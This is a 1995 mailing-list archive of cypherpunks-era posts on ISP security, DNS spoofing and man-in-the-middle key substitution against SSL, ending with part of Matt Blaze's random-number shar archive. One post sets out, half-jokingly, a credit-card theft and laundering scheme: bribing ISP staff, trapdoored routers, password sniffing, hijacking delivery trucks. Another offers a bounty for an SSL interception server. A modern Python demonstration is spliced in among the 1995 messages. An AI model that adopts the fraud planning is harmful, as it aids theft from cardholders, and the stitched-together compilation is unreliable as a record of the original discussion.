| 	1) ISP's manage internal and external back bones in a secure mode.
| 	   This means that nobody except critical internal staff can snoop
| 	   customer traffic or program routers - by network design.
| 
| 	2) ISP's manage the bridge/routers and subnets for network customers
| 	   (dedicated/slip/ppp) with advertised routes/domains/MX service
| 	   as secure too.
| 
| 	3) They firewall the billing systems, key servers, and monitor
| 	   the security for them very carefully.
| 
| 	4) They have a relatively insecure interactive environment on its own
| 	   subnet behind a bridge/router/etherswitch to isolate it from the
| 	   internal backbone.
| 
| The CSN/Brad Huntting response was:
| 
| >I don't believe any ISP's do this. "As secure"?  This [...] is fantasy.
| 
| With this model we can make some assertions (not necessarily true today):
| 
| 	A) Customer data between two full-time (#2 above) subscribers (of
| 	   at least the same provider, and reasonably expected between major
| 	   providers) *SHOULD* be expected to be secure *AND* that they devote
| 	   the resources to insure that it remains secure. Without this
| 	   everyone using the internet to transact business is highly at risk.
| 
| 	B) Mail service between two full-time (#2 above) subscribers (of
| 	   at least the same provider, and reasonably expected between major
| 	   providers) *SHOULD* be expected to be secure. This is clearly not
| 	   true today since some providers use interactive customer systems
| 	   for mail servers - so fall back delivery via MX records drop mail
| 	   into an insecure environment.
| 
| The CSN/Brad Huntting response was:
| 
| > E-Mail?  Secure?  You are high...
| 
| It's no wonder an increasing number of companies are all but disconnecting
| from the internet.
| 
| The interactive systems at providers sites are completely a different cow/pig
| ...  they are difficult to class as anything but unsecure/hostile since the
| user base has *NO* controls. Anybody that pays their startup fees can get an
| account and hack/crack for at least a month. Running www, other clients or
| servers which transact business in this environment is fundamentally insecure.
| Because of this, the home computer model over slip/ppp should be the only or
| preferred way to do internet business.
| 
| Any rational provider needs to firewall their "support" systems (routers,
| billing systems, and key servers) from this interactive zoo, slip/ppp/dedicated
| customers, and the rest of the internet. The Kevin Mitnick attack was pure
| stupidity ... he left a trail to his apartment. The providers involved didn't
| do enough to firewall their support systems. Dozens/hundreds of other hackers
| and crackers are at least smart enough to loop their telnet/rlogins thru foreign
| sites that *WILL NOT* provide call/route trace data to the Feds and then loop
| the service such that packet correlation within a provider can not be done.
| Had Mitnick done this he would still be reaping havoc. Others probably are
| still at it, untraceable.
| 
| I have several friends that have been running mail order businesses via
| WEB servers ... you can order audio CD's, Video's, software, Adult toys,
| and other interesting things from them. They are also cracker targets since
| they do business via credit cards from their systems. Unless somebody can
| start making the core part of the network secure and drive the cracker
| havens from the net, I would not be surprised if the credit card companies
| start withdrawing authorization from these businesses. Some of the non-credit
| card companies, like Pizza Hut will also get tired of the internet when
| some SOB floods them with prank orders day in and day out ...
| 
| Current "secure protocols" are hardly secure in an insecure environment, they
| require at least a certain trusted agent/transport domain to work.  If we are
| going to "cleanup the net", it is going to be with providers and users taking
| responsibility for securing the primary backbones and provider resources, then
| removing the hostile users and havens from the net.
| 
| Having safe-havens on the net where hackers from around the world can safely
| telnet thru has to stop ... before business on the internet is practical.
| Getting the ISP's to accept basic route/data security as part of their service
| offering is mandatory for any successful encryption scheme. NetScape's current
| problems are just the tip of the iceberg.
| 
| -----------
| John Bass
| UNIX Consultant                     Development, Porting, Performance by Design
| 
| 
| From jbass Mon Sep 25 16:48:29 1995
| To: isig@netf.org, rmiug-discuss@rmiug.org
| Subject: encryption in an insecure environment
| Status: O
| 
| Since several Public Key and PGP supporters don't understand the basics
| of their own offerings ... I'll provide the rebuttal publicly for the
| rest of you who may have been confused by my last posting.
| 
| Encryption security is only as good as the security of the "key(s)" involved.
| How keys are transmitted is the weak link for network based encryption
| security systems.
| 
| First Public Key encryption is far better than "pretty good" as long as
| you know the sending party *IS* using *YOUR* key. The problem is that
| when one or more messengers are in the loop, they can keep the recipient's
| key and provide the sender with their own key. When they get the sender's
| message they can decode the text, then re-encode it with the key obtained
| from the recipient before passing it along to the recipient.
| 
| Using Public Key encryption over the internet therefore requires that the
| messengers (ISP's and the commercial internet backbones) are trustworthy
| in delivering keys and limiting data access. If any point in the network
| allows a hacker to substitute keys and reencrypt messages, then communication
| between the customer and vendor is insecure. Routers, bridges, and Domain
| Name Servers become key targets and must be trusted and secure. This is not
| true today.
| 
| John Bass
| UNIX Consultant                     Development, Porting, Performance by Design
| 
| From jbass Tue Sep 26 20:46:01 1995
| To: rmiug-discuss@rmiug.org, isig@netf.org
| Subject: DNS role in an insecure network environment
| Status: O
| 
| Since some folks here may not understand why Domain Name Servers
| and the routes to/from them must be secure I'll provide a short
| description of why attacking them, or their routing, can be used
| to attack a vendor's server system.
| 
| Domain Name Service (DNS) has several critical roles in regard
| to supporting internet security. This opens the door for several
| interesting attacks.
| 
| It is critical that the mapping of host.domain a client system results
| in the internet address of the server host requested - and not that of
| some substituted server intercepting traffic for it.
| 
| If an attacker can convince a client system to resolve requests for
| server.vendor.domain to the substituted server, then the attacker can
| forward the client's requests to the real server while skimming the
| data involved. There are several ways to do this ranging from directly
| attacking the DNS system to injecting substituted DNS replies into the
| network. Doing this on an ISP's interactive system simply requires
| gaining enough privilege to either edit/replace host name tables or
| forcing an entry into the network kernel cache. Since DNS entries are
| cached, the substituted server address can have a fairly long life. The
| substituted server can be any machine in the world ... either in a safe
| haven zone or another compromised site to protect the hacker's identity.
| 
| Authentication often requires that given some client/server address
| that you can trust DNS services to map it to the correct host.domain
| name which is then compared with an access control list.  Many network
| servers can be attacked by substituting a trusted site's name given the
| attacker's address.
| 
| The reliance on DNS creates a house of cards out of internet security,
| particularly since the ISP's internal network and internet backbone
| is managed without explicit attention to data/routing/DNS security. The
| ISP's seem to think it's the user's problem ... without any viable solution.
| 
| John
| 
| From jbass Thu Sep 28 08:14:26 1995
| To: Steve Hultquist <ssh@rmii.com>
| Subject: Re: DNS role in an insecure network environment
| Cc: rmiug-discuss@rmiug.org, isig@netf.org
| Status: O
| 
| Steve,
| 
| Let's recap this in brief. In the first three postings I formed a strong
| argument that a collection of technologies in current use and perceived
| as secure, have in fact several lines of attack related to the messenger
| problem of distributing public keys. Nobody has offered a rebuttal to
| this method of attack showing the assertions invalid.
| 
| This assertion directly implies that current practice of using Public
| Key encryption with inband keys is flawed, independent of the merits
| of the encryption algorithm, key algorithm or key length.
| 
| Independent of the merits of any encryption or authentication algorithm,
| accepted solutions to the messenger attack require the existence of
| either an out-of-band key or a secure communications channel. How secure
| the channel must be depends on several factors. At minimum it must have
| routing integrity, which is not currently the case, to prevent a third
| party from inserting a filter (messenger) into the data path. Preferably
| the data path would not be clear text at all.
| 
| There are millions of customers and a large number of vendors accepting
| the current technology without the knowledge of its flaws.
| 
| You jump in with two postings which attempt to discredit my assertions
| purely with the force of your reputation saying it ain't so, and offer
| your signature lines as proof. And then get highly personal and offended
| when I question your weak attack.
| 
| There are solutions to the problem, but they are not in widespread use
| on the internet to protect WWW commerce. CryptoCards are neat, but they
| are not the solution for the WWW. Third party systems still have the
| messenger problem unless an out-of-band key exists or the communication
| channel is secure to start with.
| 
| My business cards just say "consultant" ... I also have a few left that
| say "janitor" (for cleaning up other engineers' messes, and emptying the
| trash after my employees). I also have a few that simply say "owner",
| but I have never thought it quite right to run my 1-10 man shop with
| the title president, CEO, or whatever titles that are used by those
| with the real responsibility for running multi-million/billion dollar
| companies with hundreds/thousands of people's jobs/lives at stake.
| 
| 
| You say:
| 
| 	I think the technology is well-understood and has to do with
| 	key escrow by trusted servers.
| 
| and I say fine, but that doesn't help today's customers. The messenger
| problem still exists with dynamic in-band registration, an out-of-band
| key is still needed..
| 	
| 	Yes, it takes a little time to set up third-party
| 	key servers, but it's not *that* difficult.  And, fortunately, it has
| 	nothing to do with major changes to things as fundamental as DNS.
| 
| and I say fine, but that doesn't help today's customers. Nor did I advocate
| changes to DNS ... just cleaning up the security of the channels it operates
| over.
| 	
| 	I don't think [out-of-band] key management is that difficult.
| 
| I don't think it is either, *IF* done by the ISP for the ISP's protection
| domain *AND* the ISP's implement an extended protection domain to cover
| the backbone and all ISP's. But that's not here today either
| 	
| 	Are you familiar with the current IETF working groups?  Would you
| 	like to provide us with an assessment of the various approaches, including
| 	IPv6 (which, by the way, we are demonstrating here at Networld+Interop this
| 	week: http://www.interop.net)?
| 
| As I stated in my original post I don't claim to be an internet security expert.
| You do.
| 
| The real point is that none of this protects today's customers and vendors.
| I am not going to beat my chest and hope some group can change the risks
| for www customers in the next year either. (But it would be nice)
| 	
| 	>Since current systems depend on messengers, they are flawed from
| 	>a security standpoint no matter how many million may be in use.
| 	>The NetScape encryption that was just broken was widely in use
| 	>and success by your definition ... by mine it was a failure due
| 	>to its flaws ... exploited or not.
| 	
| 	Hogwash.  Netscape was broken because they screwed up their randomization
| 	routine.  It has nothing to do with the inherent security of the design,
| 	other than the flawed randomization.  These are the rumors I was talking about.
| 
| (grin) then prove it. Disprove the messenger attack. This is not a complex
| theory or algorithm we are talking about. The thousand or so readers of
| these lists will sleep a lot better if you can.
| 	
| 	>And therein lies the crux of the problem, trusting people with your title
| 	>for security who claim to be experts, yet just stick their head in the sand ...
| 	
| 	You know, John, you are one of the most caustic people I have ever conversed
| 	with.  You don't know me, other than our e-mail conversations, yet you
| 	continue to denigrate me in public.  I won't talk about my background,
| 	except to say that none of my security implementations have been
| 	compromised, my clients recommend me to others, and I am well aware of those
| 	times I need to enlist other experts.
| 	
| 	Unlike you, John, I'm not perfect, and can use the assistance of others at
| 	times.
| 
| Gee ... for somebody that doesn't know me either you bring a lot of personal
| stabs into this. "stick their head in the sand" is pretty meek compared to
| your full on attack.
| 	
| 	>please explain to the rest of how your CryptoCard can be used
| 	>to solve the problem for the rest of us that would like to wander
| 	>the Web and shop without physically registering our card
| 	>with each store.
| 	
| 	You'd only need to register it with a key server.  But, you won't be
| 	convinced, will you, John?
| 
| and several million readers installed on every PC, and several million more cards
| with unique ID's manufactured and distributed to users world wide, and the
| coding would have to have a trap door for the NSA and law enforcement which
| would soon become widely known by all cyber crooks and econo terrorists.
| (or copies of the servers database should some employee decide that a new
| name and foreign home and retirement plan was worth the price of walking out
| the front door with some extra in their pocket) Not every problem has
| a technical solution ... not even for technical secrets.
| 	
| 	>dream on and sleep well ...
| 	
| 	I sleep well almost every night.  And so do my clients.
| 	
| 	It makes me wonder about yours.  If you have any.
| 	
| cheap shot ... sleep on. (but I wonder about your ...)
| 
| 	Cheers,
| 	ssh
| 	--
| 	Steve Hultquist                   Distributed Systems and Internet Engineering
| 	President, Worldwide Solutions, Inc.                         Boulder, Colorado
| 
| John Bass
| Janitor, DMS Design		;-))
| 
| From jbass Fri Sep 29 01:28:26 1995
| To: isig@netf.org, rmiug-discuss@rmiug.org
| Subject: How to get rich from this ...
| Status: R
| 
| 
| Security flaws for the most part are just fun toys. With WWW & credit cards
| we can really let our fingers do the walking. Thru the internet backbone
| travels thousands of credit cards with authorization data every day/hour/minute.
| Or you can be a little more selective and pick a state, city, or smaller
| geographical area by choosing which pipe to plug into.
| 
| Where good old phone banks with people and the net differ - is a single
| electronically readable pipe of treasure outside the normal EFT security
| channels. This centralization of data is what makes it attractive *IF*
| you find a way to turn it into cash without getting caught or the risk of
| getting caught can be outweighed by the gains.
| 
| How much can 5,000 credit cards be worth ... 1,000-3,000 each to the tune
| of say 10 million if you are thinking small. On a little bit more grand
| scale 10X or 100X is possible with some planning on how to get the money
| into a usable place. We are talking more money than can be obtained from
| even the biggest of bank or collectable robberies. I think that makes it
| a goal of at least somebody out there ... if not an unknown cyber crook,
| organized crime, revolutionaries, some third world government.
| 
| Some planning is in order - how to plug into the pipe, how to get the
| money out. This is the fun part ;-)
| 
| We could probably afford to give say $50K to some college kid working for
| the regional ISP to find out a router passwd or two and share them with us.
| Maybe we are a little more discrete and simply put in a job application with
| them for the summer, or we buy a few dozen very expensive routers and sell
| them cheap after installing a trap door in their firmware. Maybe we just
| do it the old-fashioned way and crack the root passwd on the interactive server
| and leave a background process watching /dev/nit for router passwds around
| the time we know they are going to do some reconfiguration.
| 
| Getting the money out is the real creative part.  Certainly running down
| and taking out cash advances is out of the question - or at least boring.
| We could do it the simple way - for each card in a targeted city, binary
| search its limit by ordering various non-traceable commodities like Pentium
| CPU's, memory, jewelry, gold/silver coins for the card owners shipped to
| their homes - then hijack the FedX and UPS regional delivery trucks first
| thing in the morning. Since the goods are prepaid, it will probably take
| several days before they can figure out the magnitude of the deal. Probably
| time to do it a couple more times. Certainly doing say 50 at the same time
| could yield a diversified retirement income.
| 
| Without the glamour is more tried and true ways - hire a few hundred
| college kids to start a chain of computer software stores. Build volume
| by selling exactly at operating costs - undercutting everybody. When the
| bank gets used to the credit card rate, hold a few loss leader sales to
| create some great peaks ... then dump the entire stolen credit card list
| spread out against all the stores over a week period - slamming the cash
| into places difficult to find and run like heck. With luck you may be able
| to shield your identity and be faceless after the fallout.
| 
| Take a large portion of the earnings to the track, powerball offices,
| and your local bookie ... REALLY HIDE the rest. If you get caught nobody
| will have the foggiest idea of how much is in your retirement fund
| after writing a best selling crime series in the slammer. Hopefully
| they will allow notebook computers and ISDN lines in cells by then.
| 
| Find your body double and do everything in their name and town -- that's
| FYI on the SLY of course ....
| 
| Unlike others, I have a strong dislike for centralized key databases, they
| make too big a target for traditional sorts of penetration - the data is
| worth thousands times more than you are likely to pay for it under the table.
| 
| I am a strong supporter of Public Key for both private and commercial data
| protection ... but you must be fully aware to protect the initial key. As
| used by most applications, the messenger attack is possible.
| 
| have fun, hope you enjoyed this series.
| 
| The Janitor :)
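
The "messenger" key substitution described in the message above, and the out-of-band key it calls for, as an added example that is not part of the original posts. A toy Diffie-Hellman agreement stands in for the public-key step; the group parameters, class names and function names are assumptions made for this sketch.

```python
"""Added example: in-band key delivery versus an out-of-band fingerprint check."""
import hashlib
import hmac
import secrets

# Toy Diffie-Hellman group, constructed for this demo (far too small for real use).
P = 2**127 - 1   # a Mersenne prime
G = 3


class KeySubstitutionError(Exception):
    """The key that arrived in-band does not match the out-of-band fingerprint."""


def keypair():
    """Return (private, public) for the toy group."""
    priv = secrets.randbelow(P - 3) + 2          # 2 .. P-2
    return priv, pow(G, priv, P)


def fingerprint(pub):
    """Short value a vendor can hand out by a separate channel (paper, phone)."""
    return hashlib.sha256(pub.to_bytes(16, "big")).hexdigest()


def session_key(priv, peer_pub):
    """Symmetric key derived from the shared Diffie-Hellman secret."""
    return hashlib.sha256(pow(peer_pub, priv, P).to_bytes(16, "big")).digest()


class Party:
    def __init__(self, name):
        self.name = name
        self.priv, self.pub = keypair()

    def key_with(self, peer_pub):
        return session_key(self.priv, peer_pub)


def honest_path(pub):
    """A network path that delivers the vendor's key unchanged."""
    return pub


def substituting_path(messenger):
    """A path where the relay hands out its own key in place of the vendor's."""
    def deliver(_vendor_pub):
        return messenger.pub
    return deliver


def customer_handshake(customer, delivered_pub, pinned_fp=None):
    """Derive a session key; with a pin, refuse any key that does not match it."""
    if pinned_fp is not None:
        if not hmac.compare_digest(fingerprint(delivered_pub), pinned_fp):
            raise KeySubstitutionError("delivered key does not match pinned fingerprint")
    return customer.key_with(delivered_pub)


def run_scenarios():
    vendor, customer, messenger = Party("vendor"), Party("customer"), Party("messenger")
    pin = fingerprint(vendor.pub)     # assumed to reach the customer out of band
    swap = substituting_path(messenger)
    results = {}

    # 1. Key delivered in-band over an honest path: both ends agree.
    k = customer_handshake(customer, honest_path(vendor.pub))
    results["inband_honest_matches_vendor"] = k == vendor.key_with(customer.pub)

    # 2. Key delivered in-band through the relay: the customer cannot tell,
    #    and the key it derives is one the relay can also compute.
    k = customer_handshake(customer, swap(vendor.pub))
    results["inband_substituted_matches_vendor"] = k == vendor.key_with(customer.pub)
    results["inband_substituted_known_to_messenger"] = k == messenger.key_with(customer.pub)

    # 3. Same relay, but the customer holds the out-of-band fingerprint.
    try:
        customer_handshake(customer, swap(vendor.pub), pin)
        results["pinned_substitution_detected"] = False
    except KeySubstitutionError:
        results["pinned_substitution_detected"] = True

    # 4. The pin does not get in the way of an honest delivery.
    k = customer_handshake(customer, honest_path(vendor.pub), pin)
    results["pinned_honest_matches_vendor"] = k == vendor.key_with(customer.pub)
    return results


if __name__ == "__main__":
    for name, value in run_scenarios().items():
        print(f"{name}: {value}")
```

The strength of the cipher or key length plays no part in scenario 2; only the fingerprint that travelled by a separate channel lets the customer reject the swapped key.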





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:10:47 PDT
To: rmiug-discuss@rmiug.org
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9509301910.AA10970@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain


Well guys and gals ...

I spent some time reading documentation on the www servers for NetScape
and Community ConneXion (c2.org).

The "messenger attack" as described in my earlier posts regarding
public key encryption and key management seems to apply to NetScape's SSL.
I have a Fifty dollar bill for the first person to submit to the mail box
nethack@dmsd.com a working Unix server (with cleartext session logs) which
accepts all connections on a unix based host to the www port and redirects
them to netscape.com leaving a clear text log of each session's SSL packets
in /tmp by session.  All entries become the property of DMS Design. The winner
and I will submit a claim for one of Community ConneXion's "I HACKED NETSCAPE"
tee shirts as a server hack. (Have Fun!!)

After a careful examination of NetScape's public documentation it appears
that SSL, which is based upon RSA's public key technology, may be down for the
count. The fall of SSL would doom NetScape's current claim of "Strong exhortable
cryptography for credit card-based financial transactions" as outlined
in Taher Elgamal's (NetScape's Chief Scientist) white paper titled
"COMMERCE ON THE INTERNET: CREDIT CARD PAYMENT APPLICATIONS OVER THE INTERNET"
Version 1.00 dated July 14, 1995 which can be found on the www as
http://home.netscape.com/newsref/std/credit.html. SSL doc can be found as
http://home.netscape.com/newsref/std/SSL.html.

John L. Bass
Owner, DMS Design





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:26:04 PDT
To: rmiug-discuss@rmiug.org
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9509301925.AA11020@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain



In case SSL packets are not available from NetScape homepage server,
use the netscape server of your choice in the contest ...

have fun,
John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:39:36 PDT
To: rmiug-discuss@rmiug.org
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9509301940.AA11065@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain



and yes I'll accept server hacks which run on linux and bsd too :)
John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 30 Sep 95 12:11:37 PDT
To: cypherpunks@toad.com
Subject: Re: COE Document
Message-ID: <199509301909.PAA11718@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <n1399743612.14225@epic.org>, banisar@epic.org ("Dave Banisar")
wrote:

Here are some thoughts.

[...]

>                        Recommendation No. R (95) 13

> Recommendations No. R (87) 15
> regulating the use of personal data in the police state and
> Recommendations No. R (89) 9 on computer-relating crime,

The countries of the EC are police states and admit to it in an official
document.

[...]

> 3. During execution of a search, investigating authorities should have the
> power, subject to appropriate safeguards, to extend the search of other
> computer systems within their jurisdiction which are connected by means of
> a network and seize the data therein, provided immediate action is
> required.

If the computer to be searched is connected to the Internet, any other
computer connected to the Internet and located in the same country may be
searched as well without requiring a second warrant.

> 12. Specific obligations should be imposed on service providers who offer
> telecommunications services to the public, either through public or
> private networks, to provide information to identify the user, when so
> ordered by the competent investigating authority.

Remailers will be outlawed.

[...]

> V. Use of Encryption 
> ---------------------
> 
> 14. Measures should be considered to minimise the negative effects of the
> use of cryptography on the investigation of criminal offenses, without
> affecting its legitimate use more than is strictly necessary.

GAK is coming.

The new world order is unmasked: a global police state. Folks, it is time
to buy some rifles and lots of ammunition. Oh, I forgot, over there in
Europe you can no longer buy any. Seems the political leaders have thought
ahead.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMG2V5SoZzwIn1bdtAQG5qQF/R3iX89TlU3rRD6NeIIVMG2F7iF6SNpME
6MjNUABjfCmGRwl6llCAC/bDtc2zxndA
=pXsk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gmixo@alpha.c2.org (gmixo)
Date: Sat, 30 Sep 95 15:28:31 PDT
To: cypherpunks@toad.com
Subject: Auto-signing
Message-ID: <199509302209.PAA03217@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


would someone please send me information about any autosigning services.... like the gratis auto-signing.... and others like it.... thanks

gmixo





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Sat, 30 Sep 95 12:41:47 PDT
To: List <cypherpunks@toad.com>
Subject: The 4th Estate
Message-ID: <Pine.OSF.3.91.950930151927.23796B-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



	I am a freelance journalist who has been 'lurking' on your list
for about six months now. I have a great interest in cryptography and the
mathematics behind cyphers. I write a weekly column about computers and
the Internet in a small town newspaper in Brantford Ontario. I was
particularly interested in the SSL crack that took place recently and I
wrote an article about the feat and talked about some of the implications
of this use of the Internet. 
	In previous articles I have spoken about the need for widespread,
strong, cryptography to both protect personal privacy and to aid secure
business communications. I have been following the debate about a 
Cypherpunk spokesperson with some interest and I thought that I would 
throw in my two cents worth (2.5 cents Canadian! :-})
	It is always difficult to get a group of strong individualists 
to agree to a common cause or to allow one person to become a spokesman 
for the group. Such a position grants a certain amount of 'power', for 
lack of a better word, to such a person. I think that there is no need 
for such a person. Each of us has a different point of view that, while 
sharing some common ideas, cannot be reconciled with any 'official' position.
	I think that the accomplishments of the group speak volumes and 
have no fear, the public is listening. I do, however, detect some small 
amount of smugness attached to comments about 'Joe Sixpack'. While it is 
true that the average citizen is not interested in esoteric subjects such 
as cryptography, do not underestimate the importance of communicating 
with them. Their votes and elected representatives will control the 
future legislation regarding cryptography. It is vital that they 
understand just what is at stake in this debate, and that they make 
decisions based upon knowledge and not upon fear.
	Therefore, it is important that we ALL do our share of 
communicating with the press and the public. Without our input, the 
scaremongers will carry the day.
	In the meantime, keep up the good work. If anyone wants copies of 
the articles that appeared in the paper, E-mail me and I will send them. 
If there is enough demand I will post them to the list. Don't worry, 
they are only about 700 words each.

Regards, 

Tim Philp
Brantford, Ontario
Canada

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAy/KL1MAAAEEALIrcJLNr3LTauphCzkU1SNtZkUPCEH14xIxVaiSM/7850/y
6qkA17N0/4E20RiyQIZ7TZf2vpbaTHs88+jU4Lvb/fBWBnL1AZBdW7I1+vNSMGzG
ljBzU9X+BXrBFYi4CzpWhqOo+a2IQaJx4sZ7w/GG59gdFIyps3seeMISF+fVAAUR
tCBUaW0gUGhpbHAgPGJwbGliQG5pYy5ob29rdXAubmV0Pg==
=6Rrp
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sat, 30 Sep 95 12:35:48 PDT
To: cypherpunks@toad.com
Subject: my favorite random-numbers-in-software package (unix)
Message-ID: <199509301946.PAA15565@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


About a week ago I posted my (Don Mitchell's really) truerand() routine
for Unix.  truerand() needs some post-processing before use; it cannot
be used directly.  Here's a more complete version; the main interface is
randbyte(), which returns (in about a third of a second) one really
random byte (based on 64 truerand() bits) that can be used directly.
As an added bonus, the library also throws in a shs-2 function and the
basic truerand() code.

The basic idea is that you exploit randomness in the drift between
the processor clock and the rate at which interval timer interrupts
occur.  Such drift occurs even on idle processors.  randbyte() assumes
that there's at least about .4 bits of "entropy" per interrupt, which is 
(probably) a safe assumption on modern processors.  Randomness introduced
by the OS (scheduler, etc.) can add to the overall entropy, but shouldn't
be relied upon by itself.

An advantage to this approach (using clock skew) is that the randomness
doesn't depend on external events like user input, network traffic or
processor load.  That makes it especially attractive for generating keys
on unattended servers, e.g., for generating Diffie-Hellman exponents.
Note, however, that very (very) slow and heavily-loaded processors may
not provide enough cycles to the truerand process between interrupts for
these assumptions to hold.  Also, all bets are off on processors that use
a single clock source for both interval timing and CPU clocking.

This code is very BSD/SunOS-centric and is completely untested elsewhere.

Read the comments for scary warnings about testing on your own platform
before using it for anything serious like generating keys.

-matt

=======================cut here==============
#!/bin/sh
# This is a shell archive (produced by GNU sharutils 4.1).
# To extract the files from this archive, save it to some FILE, remove
# everything before the `!/bin/sh' line above, then type `sh FILE'.
#
# Existing files will *not* be overwritten unless `-c' is specified.
#
# This shar contains:
# length mode       name
# ------ ---------- ------------------------------------------
#   1270 -rw-r--r-- makefile
#   1246 -rw-r--r-- randbyte.c
#   2886 -rw-r--r-- truerand.c
#   7142 -rw-r--r-- shs.c
#    149 -rw-r--r-- randtest.c
#
touch -am 1231235999 $$.touch >/dev/null 2>&1
if test ! -f 1231235999 && test -f $$.touch; then
  shar_touch=touch
else
  shar_touch=:
  echo
  echo 'WARNING: not restoring timestamps.  Consider getting and'
  echo "installing GNU \`touch', distributed in GNU File Utilities..."
  echo
fi
rm -f 1231235999 $$.touch
#
# ============= makefile ==============
if test -f 'makefile' && test X"$1" != X"-c"; then
  echo 'x - skipping makefile (file already exists)'
else
  echo 'x - extracting makefile (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'makefile' &&
# makefile for librand
# tested on Sparc-20 (SunOS 4.x) and P100 (BSDI) only.
# You're on your own elsewhere.  Read the comments for scary warnings.
#
# Usage: int randbyte();
#
#* The authors of this software are Don Mitchell, Matt Blaze & Jack Lacy.
#*              Copyright (c) 1995 by AT&T.
#* Permission to use, copy, and modify this software without fee
#* is hereby granted, provided that this entire notice is included in
#* all copies of any software which is or includes a copy or
#* modification of this software and in all copies of the supporting
#* documentation for such software.
#*
#* This software may be subject to United States export controls.
#*
#* THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
#* WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
#* REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X
SRCS=randbyte.c truerand.c shs.c
OBJS=randbyte.o truerand.o shs.o
CC=gcc
CFLAGS=
# No -O in CFLAGS! On some compilers, this optimizes out the counter...
X
librand.a: $(OBJS)
X	ar rcv librand.a $(OBJS)
X	ranlib librand.a
X
randtest: randtest.c $(SRCS)
X	cc -DDEBUGRND randtest.c $(SRCS) -o randtest
X
librand.shar: makefile $(SRCS) randtest.c
X	shar makefile $(SRCS) randtest.c > librand.shar
SHAR_EOF
  $shar_touch -am 0930150995 'makefile' &&
  chmod 0644 'makefile' ||
  echo 'restore of makefile failed'
  shar_count="`wc -c < 'makefile'`"
  test 1270 -eq "$shar_count" ||
    echo "makefile: original size 1270, current size $shar_count"
fi
# ============= randbyte.c ==============
if test -f 'randbyte.c' && test X"$1" != X"-c"; then
  echo 'x - skipping randbyte.c (file already exists)'
else
  echo 'x - extracting randbyte.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'randbyte.c' &&
/*
X *	Random byte interface to truerand()
X *	Matt Blaze 5/95
X *	eight really random bits
X *	usage: 
X *		unsigned char r; int randbyte();
X *		r=randbyte();
X *	randbyte() takes about .3 seconds on most machines.
X */
/*
X * The author of this software is Matt Blaze.
X *              Copyright (c) 1995 by AT&T.
X * Permission to use, copy, and modify this software without fee
X * is hereby granted, provided that this entire notice is included in
X * all copies of any software which is or includes a copy or
X * modification of this software and in all copies of the supporting
X * documentation for such software.
X *
X * This software may be subject to United States export controls.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
X * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
X * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */
X
int randbyte()
{
X	unsigned long truerand();
X	unsigned char *shs();
X	unsigned long r[2];
X	unsigned char *hash;
X
X	r[0]=truerand(); r[1]=truerand();
X	hash = shs(r,sizeof(r));
#ifdef DEBUGRND
X	printf("%011o %011o %02x\n",r[0],r[1],*hash & 0xff);
#endif
X	return ((int) (*hash)) & 0xff;
}
SHAR_EOF
  $shar_touch -am 0930145795 'randbyte.c' &&
  chmod 0644 'randbyte.c' ||
  echo 'restore of randbyte.c failed'
  shar_count="`wc -c < 'randbyte.c'`"
  test 1246 -eq "$shar_count" ||
    echo "randbyte.c: original size 1246, current size $shar_count"
fi
# ============= truerand.c ==============
if test -f 'truerand.c' && test X"$1" != X"-c"; then
  echo 'x - skipping truerand.c (file already exists)'
else
  echo 'x - extracting truerand.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'truerand.c' &&
/*
X *	Physically random numbers (very nearly uniform)
X *	D. P. Mitchell 
X *	Modified by Matt Blaze 2/95
X */
/*
X * The authors of this software are Don Mitchell and Matt Blaze.
X *              Copyright (c) 1995 by AT&T.
X * Permission to use, copy, and modify this software without fee
X * is hereby granted, provided that this entire notice is included in
X * all copies of any software which is or includes a copy or
X * modification of this software and in all copies of the supporting
X * documentation for such software.
X *
X * This software may be subject to United States export controls.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
X * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
